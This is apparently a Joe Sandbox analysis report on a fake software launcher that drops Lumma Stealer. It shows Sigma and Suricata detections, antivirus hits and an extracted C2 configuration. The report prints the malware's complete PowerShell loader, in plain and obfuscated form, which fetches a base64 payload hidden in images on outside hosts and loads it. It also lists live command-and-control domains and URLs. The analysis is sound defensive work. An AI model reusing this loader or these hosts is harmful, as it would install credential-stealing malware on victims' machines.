Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67f525209658e.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7136, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs" , ProcessId: 2920, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67f525209658e.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7136, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs" , ProcessId: 2920, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe, ProcessId: 7040, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/fsdfsdfs/fsdfdsfsdfsdf/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IeAhfaf/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/fsdfsdfs/fsdfdsfsdfsdf/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $sta

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67f525209658e.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7136, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs" , ProcessId: 2920, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZgBz@GQ@ZgBz@GQ@ZgBz@C8@ZgBz@GQ@ZgBk@HM@ZgBz@GQ@ZgBz@GQ@Zg@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@y@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Ck@L@@g@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBv@GY@aQBj@GU@Mw@2@DU@LgBn@Gk@d@Bo@HU@Yg@u@Gk@bw@v@DE@LwB0@GU@cwB0@C4@agBw@Gc@Jw@p@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@K

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2224, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/fsdfsdfs/fsdfdsfsdfsdf/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IeAhfaf/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/fsdfsdfs/fsdfdsfsdfsdf/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $sta

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-12T02:08:54.869406+0200	2028371	3	Unknown Traffic	192.168.2.4	49719	104.21.42.7	443	TCP
2025-04-12T02:08:56.990554+0200	2028371	3	Unknown Traffic	192.168.2.4	49724	104.21.42.7	443	TCP
2025-04-12T02:08:58.093297+0200	2028371	3	Unknown Traffic	192.168.2.4	49726	104.21.42.7	443	TCP
2025-04-12T02:08:59.054235+0200	2028371	3	Unknown Traffic	192.168.2.4	49727	104.21.42.7	443	TCP
2025-04-12T02:09:00.944764+0200	2028371	3	Unknown Traffic	192.168.2.4	49728	104.21.42.7	443	TCP
2025-04-12T02:09:02.187885+0200	2028371	3	Unknown Traffic	192.168.2.4	49729	104.21.42.7	443	TCP
2025-04-12T02:09:04.507669+0200	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.42.7	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-12T02:08:54.869406+0200	2061396	1	Domain Observed Used for C2 Detected	192.168.2.4	49719	104.21.42.7	443	TCP
2025-04-12T02:08:56.990554+0200	2061396	1	Domain Observed Used for C2 Detected	192.168.2.4	49724	104.21.42.7	443	TCP
2025-04-12T02:08:58.093297+0200	2061396	1	Domain Observed Used for C2 Detected	192.168.2.4	49726	104.21.42.7	443	TCP
2025-04-12T02:08:59.054235+0200	2061396	1	Domain Observed Used for C2 Detected	192.168.2.4	49727	104.21.42.7	443	TCP
2025-04-12T02:09:00.944764+0200	2061396	1	Domain Observed Used for C2 Detected	192.168.2.4	49728	104.21.42.7	443	TCP
2025-04-12T02:09:02.187885+0200	2061396	1	Domain Observed Used for C2 Detected	192.168.2.4	49729	104.21.42.7	443	TCP
2025-04-12T02:09:04.507669+0200	2061396	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	104.21.42.7	443	TCP

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-12T02:08:46.514925+0200	2049038	1	A Network Trojan was detected	185.199.108.153	443	192.168.2.4	49711	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (changeaie .top)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-12T02:08:54.392812+0200	2061395	1	Domain Observed Used for C2 Detected	192.168.2.4	54682	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soursopsf .run)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-12T02:08:54.244709+0200	2061393	1	Domain Observed Used for C2 Detected	192.168.2.4	49805	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (xcelmodo .run)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-12T02:08:54.120508+0200	2061407	1	Domain Observed Used for C2 Detected	192.168.2.4	55875	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://changeaie.top:443/gepst	Avira URL Cloud: Label: malware
Source: https://changeaie.top:443/geps2o	Avira URL Cloud: Label: malware
Source: https://changeaie.top/	Avira URL Cloud: Label: malware
Source: https://changeaie.top/gepsw=	Avira URL Cloud: Label: malware
Source: https://changeaie.top/gepsA	Avira URL Cloud: Label: malware
Source: https://changeaie.top:443/geps	Avira URL Cloud: Label: malware
Source: http://62.60.226.112/public_files/fafhAeI.txt	Avira URL Cloud: Label: phishing
Source: https://changeaie.top/8	Avira URL Cloud: Label: malware
Source: https://ofice365.github.io/1/test.jpg09	Avira URL Cloud: Label: malware
Source: https://changeaie.top/gepse	Avira URL Cloud: Label: malware
Source: https://changeaie.top/geps	Avira URL Cloud: Label: malware
Source: https://changeaie.top/kn	Avira URL Cloud: Label: malware

Found malware configuration

Source: 14.2.MSBuild.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["xcelmodo.run/nahd", "soursopsf.run/gsoiao", "changeaie.top/geps", "easyupgw.live/eosz", "liftally.top/xasj", "upmodini.digital/gokk", "salaccgfa.top/gsooz", "zestmodp.top/zeda"], "Build id": "ccc04d7745fc159dc47db3d9c13da52e790fa62660a48c5dc73f"}

Multi AV Scanner detection for submitted file

Source: IMSoftware{Launcher}3.21.exe	Virustotal: Detection: 54%			Perma Link
Source: IMSoftware{Launcher}3.21.exe	ReversingLabs: Detection: 52%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 100.0%

Sample uses string decryption to hide its real strings

Source: 14.2.MSBuild.exe.400000.0.unpack	String decryptor: xcelmodo.run/nahd
Source: 14.2.MSBuild.exe.400000.0.unpack	String decryptor: soursopsf.run/gsoiao
Source: 14.2.MSBuild.exe.400000.0.unpack	String decryptor: changeaie.top/geps
Source: 14.2.MSBuild.exe.400000.0.unpack	String decryptor: easyupgw.live/eosz
Source: 14.2.MSBuild.exe.400000.0.unpack	String decryptor: liftally.top/xasj
Source: 14.2.MSBuild.exe.400000.0.unpack	String decryptor: upmodini.digital/gokk
Source: 14.2.MSBuild.exe.400000.0.unpack	String decryptor: salaccgfa.top/gsooz
Source: 14.2.MSBuild.exe.400000.0.unpack	String decryptor: zestmodp.top/zeda

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Code function: 0_2_00007FF66FD630EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,	0_2_00007FF66FD630EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0041F086 CryptUnprotectData,	14_2_0041F086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_00420276 CryptUnprotectData,	14_2_00420276
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 14_2_0041F8AE CryptUnprotectData,	14_2_0041F8AE

Source: unknown	HTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.4:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: IMSoftware{Launcher}3.21.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: wextract.pdb source: IMSoftware{Launcher}3.21.exe
Source:	Binary string: wextract.pdbGCTL source: IMSoftware{Launcher}3.21.exe

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Code function: 0_2_00007FF66FD6204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

0_2_00007FF66FD6204C

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], al	14_2_0043933F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	14_2_004525D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	14_2_0040F608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch]	14_2_0044B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [ebp-24h]	14_2_0040D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+edx]	14_2_0040D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-53E68C8Ah]	14_2_00410AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 5675B2C2h	14_2_00453CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edx], al	14_2_00439D09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-659874E8h]	14_2_00430F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-74h]	14_2_0042F006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edi], cl	14_2_0043A00A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+74363E86h]	14_2_00450030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	14_2_004370E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [edi], cx	14_2_0042A150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [esp], edx	14_2_0043816C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [esp], edx	14_2_00438172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+000000E0h]	14_2_00422110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ebx, eax	14_2_00408190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-072853DAh]	14_2_0044C220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [esi], 00000000h	14_2_0040F2A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-1319CCD0h]	14_2_00430374
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	14_2_0040F3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [esp+04h], ebx	14_2_004113B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	14_2_0040F3BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then inc edx	14_2_00452440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	14_2_00435450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp+30h]	14_2_00449410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+10h]	14_2_004334F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], cx	14_2_004345F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, esi	14_2_004295B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	14_2_004295B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+46h]	14_2_004116E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	14_2_0044D770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+34h]	14_2_004347A0
